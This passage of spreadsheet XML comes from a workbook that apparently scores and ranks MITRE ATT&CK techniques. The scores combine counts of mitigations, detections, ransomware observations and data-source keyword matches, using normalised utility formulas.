        <f t="array" ref="AH149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC149)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI149" s="25">
        <f>IF(AH149="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ149" s="25" t="str" cm="1">
        <f t="array" ref="AJ149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC149)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK149" s="25">
        <f>IF(AJ149="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL149" s="25" t="str" cm="1">
        <f t="array" ref="AL149">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC149)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM149" s="25">
        <f>IF(AL149="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN149" s="52">
        <v>4</v>
      </c>
      <c r="AO149" s="51">
        <v>1</v>
      </c>
      <c r="AP149" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.18524666666666667</v>
      </c>
      <c r="AQ149" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17304444444444445</v>
      </c>
      <c r="AR149" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17304444444444445</v>
      </c>
      <c r="AS149" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT149" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU14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50" spans="1:47">
      <c r="A150" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.5246666666666665E-2</v>
      </c>
      <c r="B150" s="25">
        <f>SUM(H150,M150,V150)*(1+SUM(AE150,AG150,AI150,AK150,AM150))</f>
        <v>0.51913333333333334</v>
      </c>
      <c r="C150" s="25" t="s">
        <v>681</v>
      </c>
      <c r="D150" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E150" s="25" t="s">
        <v>682</v>
      </c>
      <c r="F150" s="51">
        <v>1</v>
      </c>
      <c r="G150" s="51">
        <v>1</v>
      </c>
      <c r="H150" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I150">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J150">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K150">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L150">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M150" s="25">
        <v>0</v>
      </c>
      <c r="N150" s="51">
        <v>0</v>
      </c>
      <c r="O150" s="51">
        <v>8</v>
      </c>
      <c r="P150" s="51">
        <v>0</v>
      </c>
      <c r="Q150" s="51">
        <v>0</v>
      </c>
      <c r="R150" s="51" t="s">
        <v>683</v>
      </c>
      <c r="S150" s="51">
        <v>14</v>
      </c>
      <c r="T150" s="51" t="s">
        <v>684</v>
      </c>
      <c r="U150" s="51">
        <v>17</v>
      </c>
      <c r="V150" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="W150">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>31</v>
      </c>
      <c r="X150">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Y150">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Z150">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA150">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB150">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC150" s="29" t="s">
        <v>607</v>
      </c>
      <c r="AD150" s="25" t="str" cm="1">
        <f t="array" ref="AD150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC150)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE150" s="25">
        <f>IF(AD150="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF150" s="25" t="str" cm="1">
        <f t="array" ref="AF150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC150)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG150" s="25">
        <f>IF(AF150="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH150" s="25" t="str" cm="1">
        <f t="array" ref="AH150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC150)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI150" s="25">
        <f>IF(AH150="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ150" s="25" t="str" cm="1">
        <f t="array" ref="AJ150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC150)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK150" s="25">
        <f>IF(AJ150="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL150" s="25" t="str" cm="1">
        <f t="array" ref="AL150">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC150)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM150" s="25">
        <f>IF(AL150="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN150" s="62">
        <v>1</v>
      </c>
      <c r="AO150" s="51">
        <v>1</v>
      </c>
      <c r="AP150" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.5246666666666665E-2</v>
      </c>
      <c r="AQ150" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17304444444444445</v>
      </c>
      <c r="AR150" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17304444444444445</v>
      </c>
      <c r="AS150" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT150" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU15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51" spans="1:47" ht="48">
      <c r="A151" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9053333333333338E-2</v>
      </c>
      <c r="B151" s="25">
        <f>SUM(H151,M151,V151)*(1+SUM(AE151,AG151,AI151,AK151,AM151))</f>
        <v>0.49053333333333338</v>
      </c>
      <c r="C151" s="25" t="s">
        <v>685</v>
      </c>
      <c r="D151" s="25" t="s">
        <v>241</v>
      </c>
      <c r="E151" s="25" t="s">
        <v>686</v>
      </c>
      <c r="F151" s="51">
        <v>1</v>
      </c>
      <c r="G151" s="51">
        <v>1</v>
      </c>
      <c r="H151" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I151">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J151">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K151">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L151">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M151" s="25">
        <v>0</v>
      </c>
      <c r="N151" s="51">
        <v>0</v>
      </c>
      <c r="O151" s="51">
        <v>16</v>
      </c>
      <c r="P151" s="51">
        <v>0</v>
      </c>
      <c r="Q151" s="51">
        <v>2</v>
      </c>
      <c r="R151" s="52" t="s">
        <v>687</v>
      </c>
      <c r="S151" s="51">
        <v>8</v>
      </c>
      <c r="T151" s="51" t="s">
        <v>688</v>
      </c>
      <c r="U151" s="51">
        <v>18</v>
      </c>
      <c r="V151" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="W151">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X151">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y151">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z151">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>18</v>
      </c>
      <c r="AA151">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.18</v>
      </c>
      <c r="AB151">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.18</v>
      </c>
      <c r="AC151" s="29" t="s">
        <v>442</v>
      </c>
      <c r="AD151" s="25" t="str" cm="1">
        <f t="array" ref="AD151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC151)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE151" s="25">
        <f>IF(AD151="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF151" s="25" t="str" cm="1">
        <f t="array" ref="AF151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC151)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG151" s="25">
        <f>IF(AF151="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH151" s="25" t="str" cm="1">
        <f t="array" ref="AH151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC151)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI151" s="25">
        <f>IF(AH151="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ151" s="25" t="str" cm="1">
        <f t="array" ref="AJ151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC151)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK151" s="25">
        <f>IF(AJ151="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL151" s="25" t="str" cm="1">
        <f t="array" ref="AL151">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC151)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM151" s="25">
        <f>IF(AL151="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN151" s="60">
        <v>0</v>
      </c>
      <c r="AO151" s="51">
        <v>0</v>
      </c>
      <c r="AP151" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9053333333333338E-2</v>
      </c>
      <c r="AQ151" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16351111111111113</v>
      </c>
      <c r="AR151" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16351111111111113</v>
      </c>
      <c r="AS151" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT151" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU15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52" spans="1:47">
      <c r="A152" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.8514285714285718E-2</v>
      </c>
      <c r="B152" s="25">
        <f>SUM(H152,M152,V152)*(1+SUM(AE152,AG152,AI152,AK152,AM152))</f>
        <v>0.48514285714285721</v>
      </c>
      <c r="C152" s="25" t="s">
        <v>689</v>
      </c>
      <c r="D152" s="25" t="s">
        <v>690</v>
      </c>
      <c r="E152" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F152" s="51">
        <v>1</v>
      </c>
      <c r="G152" s="51">
        <v>1</v>
      </c>
      <c r="H152" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I152">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J152">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K152">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L152">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M152" s="25">
        <v>0</v>
      </c>
      <c r="N152" s="51">
        <v>0</v>
      </c>
      <c r="O152" s="51">
        <v>0</v>
      </c>
      <c r="P152" s="51">
        <v>4</v>
      </c>
      <c r="Q152" s="51">
        <v>3</v>
      </c>
      <c r="R152" s="52" t="s">
        <v>691</v>
      </c>
      <c r="S152" s="51">
        <v>15</v>
      </c>
      <c r="T152" s="52" t="s">
        <v>692</v>
      </c>
      <c r="U152" s="51">
        <v>16</v>
      </c>
      <c r="V152" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.32857142857142857</v>
      </c>
      <c r="W152">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>31</v>
      </c>
      <c r="X152">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Y152">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Z152">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA152">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB152">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC152" s="29" t="s">
        <v>693</v>
      </c>
      <c r="AD152" s="25" t="str" cm="1">
        <f t="array" ref="AD152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC152)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE152" s="25">
        <f>IF(AD152="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF152" s="25" t="str" cm="1">
        <f t="array" ref="AF152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC152)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG152" s="25">
        <f>IF(AF152="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH152" s="25" t="str" cm="1">
        <f t="array" ref="AH152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC152)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI152" s="25">
        <f>IF(AH152="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ152" s="25" t="str" cm="1">
        <f t="array" ref="AJ152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC152)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK152" s="25">
        <f>IF(AJ152="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL152" s="25" t="str" cm="1">
        <f t="array" ref="AL152">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC152)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM152" s="25">
        <f>IF(AL152="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN152" s="52">
        <v>0</v>
      </c>
      <c r="AO152" s="51">
        <v>0</v>
      </c>
      <c r="AP152" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.8514285714285718E-2</v>
      </c>
      <c r="AQ152" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16171428571428573</v>
      </c>
      <c r="AR152" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16171428571428573</v>
      </c>
      <c r="AS152" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT152" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU15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53" spans="1:47" ht="80.099999999999994">
      <c r="A153" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6999999999999988E-2</v>
      </c>
      <c r="B153" s="25">
        <f>SUM(H153,M153,V153)*(1+SUM(AE153,AG153,AI153,AK153,AM153))</f>
        <v>0.56999999999999995</v>
      </c>
      <c r="C153" s="25" t="s">
        <v>694</v>
      </c>
      <c r="D153" s="25" t="s">
        <v>695</v>
      </c>
      <c r="E153" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F153" s="51">
        <v>1</v>
      </c>
      <c r="G153" s="51">
        <v>1</v>
      </c>
      <c r="H153" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I153">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J153">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K153">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L153">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M153" s="25">
        <v>0</v>
      </c>
      <c r="N153" s="51">
        <v>0</v>
      </c>
      <c r="O153" s="51">
        <v>4</v>
      </c>
      <c r="P153" s="51">
        <v>6</v>
      </c>
      <c r="Q153" s="51">
        <v>1</v>
      </c>
      <c r="R153" s="52" t="s">
        <v>696</v>
      </c>
      <c r="S153" s="51">
        <v>9</v>
      </c>
      <c r="T153" s="52" t="s">
        <v>697</v>
      </c>
      <c r="U153" s="51">
        <v>20</v>
      </c>
      <c r="V153" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.32857142857142851</v>
      </c>
      <c r="W153">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>29</v>
      </c>
      <c r="X153">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.52727272727272723</v>
      </c>
      <c r="Y153">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.52727272727272723</v>
      </c>
      <c r="Z153">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA153">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB153">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC153" s="29" t="s">
        <v>698</v>
      </c>
      <c r="AD153" s="25" t="str" cm="1">
        <f t="array" ref="AD153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC153)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE153" s="25">
        <f>IF(AD153="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF153" s="25" t="str" cm="1">
        <f t="array" ref="AF153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC153)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG153" s="25">
        <f>IF(AF153="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH153" s="25" t="str" cm="1">
        <f t="array" ref="AH153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC153)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI153" s="25">
        <f>IF(AH153="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ153" s="25" t="str" cm="1">
        <f t="array" ref="AJ153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC153)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK153" s="25">
        <f>IF(AJ153="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL153" s="25" t="str" cm="1">
        <f t="array" ref="AL153">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC153)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM153" s="25">
        <f>IF(AL153="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN153" s="52">
        <v>0</v>
      </c>
      <c r="AO153" s="51">
        <v>0</v>
      </c>
      <c r="AP153" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6999999999999988E-2</v>
      </c>
      <c r="AQ153" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18999999999999997</v>
      </c>
      <c r="AR153" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18999999999999997</v>
      </c>
      <c r="AS153" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
